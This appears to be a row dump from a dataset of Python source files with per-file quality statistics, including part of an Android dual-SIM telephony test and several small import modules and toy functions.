WifiUtils.wifi_toggle_state(self.log, ad, False)
if not wait_for_data_attach_for_subscription(
self.log, ad, next_data_sub_id,
MAX_WAIT_TIME_NW_SELECTION):
self.log.error("Failed to attach data on subId:{}".format(
next_data_sub_id))
return False
if not verify_http_connection(self.log, ad):
self.log.error("No Internet access after changing Data SIM.")
return False
finally:
self.log.info("Change Data SIM back.")
set_subid_for_data(ad, current_data_sub_id)
return True
@TelephonyBaseTest.tel_test_wrap
def test_disable_data_on_non_active_data_sim(self):
"""Switch Data SIM on 2G network.
Steps:
1. Data on default Data SIM.
2. Disable data on non-active Data SIM.
Expected Results:
1. Verify Data Status on Default Data SIM and non-active Data SIM.
1. Verify Data Status on Default Data SIM and non-active Data SIM.
Returns:
True if success.
False if failed.
"""
ad = self.android_devices[0]
current_data_sub_id = ad.droid.subscriptionGetDefaultDataSubId()
current_sim_slot_index = get_slot_index_from_subid(self.log, ad,
current_data_sub_id)
if current_sim_slot_index == SIM1_SLOT_INDEX:
non_active_sim_slot_index = SIM2_SLOT_INDEX
else:
non_active_sim_slot_index = SIM1_SLOT_INDEX
non_active_sub_id = get_subid_from_slot_index(
self.log, ad, non_active_sim_slot_index)
self.log.info("Current Data is on subId: {}, SIM slot: {}".format(
current_data_sub_id, current_sim_slot_index))
if not ensure_network_generation_for_subscription(
self.log,
ad,
ad.droid.subscriptionGetDefaultDataSubId(),
GEN_2G,
voice_or_data=NETWORK_SERVICE_DATA):
self.log.error("Device data does not attach to 2G.")
return False
if not verify_http_connection(self.log, ad):
self.log.error("No Internet access on default Data SIM.")
return False
if ad.droid.telephonyGetDataConnectionState() != DATA_STATE_CONNECTED:
self.log.error("Data Connection State should be connected.")
return False
# TODO: Check Data state for non-active subId.
try:
self.log.info("Disable Data on Non-Active Sub ID")
ad.droid.telephonyToggleDataConnectionForSubscription(
non_active_sub_id, False)
# TODO: Check Data state for non-active subId.
if ad.droid.telephonyGetDataConnectionState(
) != DATA_STATE_CONNECTED:
self.log.error("Data Connection State should be connected.")
return False
finally:
self.log.info("Enable Data on Non-Active Sub ID")
ad.droid.telephonyToggleDataConnectionForSubscription(
non_active_sub_id, True)
return True
""" Tests End """
| 40.225888 | 94 | 0.600721 | 11,518 | 95,094 | 4.739538 | 0.041153 | 0.046803 | 0.027917 | 0.027844 | 0.881498 | 0.842792 | 0.813482 | 0.78595 | 0.757446 | 0.719381 | 0 | 0.016756 | 0.3247 | 95,094 | 2,363 | 95 | 40.242912 | 0.833331 | 0.220981 | 0 | 0.692199 | 0 | 0.000709 | 0.116248 | 0.020604 | 0 | 0 | 0 | 0.000423 | 0 | 1 | 0.042553 | false | 0.028369 | 0.049645 | 0 | 0.229787 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
991da7d12c98bfd58a4e73574d11344be38da489 | 49 | py | Python | examples/importing_modules/py/magic_dust/sparkles.py | mooreryan/pyml_bindgen | b326af274fca2de959c9b1ec1c61030de4633304 | [
"Apache-2.0",
"MIT"
] | 24 | 2021-11-10T06:36:17.000Z | 2022-02-08T15:16:10.000Z | examples/importing_modules/py/magic_dust/sparkles.py | mooreryan/pyml_bindgen | b326af274fca2de959c9b1ec1c61030de4633304 | [
"Apache-2.0",
"MIT"
] | 9 | 2022-01-28T05:57:08.000Z | 2022-03-23T05:59:21.000Z | examples/importing_modules/py/magic_dust/sparkles.py | mooreryan/pyml_bindgen | b326af274fca2de959c9b1ec1c61030de4633304 | [
"Apache-2.0",
"MIT"
] | 1 | 2022-01-28T05:25:19.000Z | 2022-01-28T05:25:19.000Z | def sparkles():
return('sparkle, sparkle!!')
| 16.333333 | 32 | 0.632653 | 5 | 49 | 6.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163265 | 49 | 2 | 33 | 24.5 | 0.756098 | 0 | 0 | 0 | 0 | 0 | 0.367347 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
99247c88aaa175819b45adb0430c1ab33c9388b5 | 32 | py | Python | flopco/__init__.py | ABaaaC/flopco-pytorch | 85465b493fade1b73b8209caa38d82d1c8d2a0ef | [
"MIT"
] | 14 | 2019-10-10T19:22:46.000Z | 2021-12-23T10:16:03.000Z | flopco/__init__.py | ABaaaC/flopco-pytorch | 85465b493fade1b73b8209caa38d82d1c8d2a0ef | [
"MIT"
] | 2 | 2020-09-04T13:11:55.000Z | 2021-06-04T20:13:49.000Z | flopco/__init__.py | ABaaaC/flopco-pytorch | 85465b493fade1b73b8209caa38d82d1c8d2a0ef | [
"MIT"
] | 6 | 2019-10-28T12:03:34.000Z | 2021-03-18T19:15:06.000Z | from flopco.flopco import FlopCo | 32 | 32 | 0.875 | 5 | 32 | 5.6 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9940940b714da5e1daa3d7355178294770f3d0ff | 41 | py | Python | src/python/zquantum/core/estimation/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 24 | 2020-04-15T17:36:59.000Z | 2022-01-25T05:02:14.000Z | src/python/zquantum/core/estimation/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 177 | 2020-04-23T15:19:59.000Z | 2022-03-30T18:06:17.000Z | src/python/zquantum/core/estimation/__init__.py | alexjuda2/z-quantum-core | c258100dbd091f0b22495b77b36399426ae9abac | [
"Apache-2.0"
] | 19 | 2020-06-24T10:56:02.000Z | 2021-09-30T13:02:21.000Z | from ._estimation import * # noqa: F403
| 20.5 | 40 | 0.707317 | 5 | 41 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.090909 | 0.195122 | 41 | 1 | 41 | 41 | 0.757576 | 0.243902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
995d69c01c8610d7b24c40f28231f7c85fe2e7b5 | 172 | py | Python | Source/Objects/__init__.py | Dmunch04/SquareIt | 0379b208afa397b349c119f15e2611ec93f3bedb | [
"MIT"
] | 1 | 2019-07-01T10:07:30.000Z | 2019-07-01T10:07:30.000Z | Source/Objects/__init__.py | Dmunch04/SquareIt | 0379b208afa397b349c119f15e2611ec93f3bedb | [
"MIT"
] | null | null | null | Source/Objects/__init__.py | Dmunch04/SquareIt | 0379b208afa397b349c119f15e2611ec93f3bedb | [
"MIT"
] | null | null | null | from Objects.Bomb import Bomb
from Objects.Wall import Wall
from Objects.Enemy import Enemy
from Objects.Player import Player
from Objects.Notification import Notification
| 28.666667 | 45 | 0.854651 | 25 | 172 | 5.88 | 0.32 | 0.37415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 172 | 5 | 46 | 34.4 | 0.967105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
998fc0183c72a8d8ef6719ef3b55c3cb9d8237fd | 143 | py | Python | vkbottle/framework/bot/__init__.py | shugaev1/vkbottle | 9759e8e799c2e336f44c78bc92cc8b8029da73aa | [
"MIT"
] | 98 | 2021-08-06T05:31:31.000Z | 2022-03-26T03:00:08.000Z | vkbottle/framework/bot/__init__.py | shugaev1/vkbottle | 9759e8e799c2e336f44c78bc92cc8b8029da73aa | [
"MIT"
] | 68 | 2021-08-04T09:56:12.000Z | 2022-03-31T16:23:12.000Z | vkbottle/framework/bot/__init__.py | shugaev1/vkbottle | 9759e8e799c2e336f44c78bc92cc8b8029da73aa | [
"MIT"
] | 66 | 2021-08-04T09:21:43.000Z | 2022-03-15T14:34:56.000Z | from .blueprint import BotBlueprint
from .bot import Bot
from .multibot import run_multibot
__all__ = ("Bot", "BotBlueprint", "run_multibot")
| 23.833333 | 49 | 0.776224 | 18 | 143 | 5.833333 | 0.444444 | 0.209524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125874 | 143 | 5 | 50 | 28.6 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0.188811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
41edd404f58f46808fe286ac8b69fa66b6dcd9a7 | 114 | py | Python | lichee/dataset/io_reader/__init__.py | Tencent/Lichee | 7653becd6fbf8b0715f788af3c0507c012be08b4 | [
"Apache-2.0"
] | 91 | 2021-10-30T02:25:05.000Z | 2022-03-28T06:51:52.000Z | lichee/dataset/io_reader/__init__.py | zhaijunyu/Lichee | 7653becd6fbf8b0715f788af3c0507c012be08b4 | [
"Apache-2.0"
] | 1 | 2021-12-17T09:30:25.000Z | 2022-03-05T12:30:13.000Z | lichee/dataset/io_reader/__init__.py | zhaijunyu/Lichee | 7653becd6fbf8b0715f788af3c0507c012be08b4 | [
"Apache-2.0"
] | 17 | 2021-11-04T07:50:23.000Z | 2022-03-24T14:24:11.000Z | # -*- coding: utf-8 -*-
"""
文件读取插件
"""
from . import json_sequence_label
from . import tfrecord
from . import tsv
| 14.25 | 33 | 0.666667 | 15 | 114 | 4.933333 | 0.733333 | 0.405405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010638 | 0.175439 | 114 | 7 | 34 | 16.285714 | 0.776596 | 0.254386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
510853e1a0e416f20a3bc24029e8c81acd265307 | 120 | py | Python | Chapter 01/on2.py | bpbpublications/Python-Quick-Interview-Guide | ab4ff3e670b116a4db6b9e1f0ccba8424640704d | [
"MIT"
] | 1 | 2021-05-14T19:53:41.000Z | 2021-05-14T19:53:41.000Z | Chapter 01/on2.py | bpbpublications/Python-Quick-Interview-Guide | ab4ff3e670b116a4db6b9e1f0ccba8424640704d | [
"MIT"
] | null | null | null | Chapter 01/on2.py | bpbpublications/Python-Quick-Interview-Guide | ab4ff3e670b116a4db6b9e1f0ccba8424640704d | [
"MIT"
] | null | null | null | a = [[1,2,3],[4,5,6],[7,8,9]]
sum = 0
for i in range(3):
for j in range(3):
sum += a[i][j]
print(sum)
| 17.142857 | 30 | 0.433333 | 28 | 120 | 1.857143 | 0.642857 | 0.269231 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0.3 | 120 | 6 | 31 | 20 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.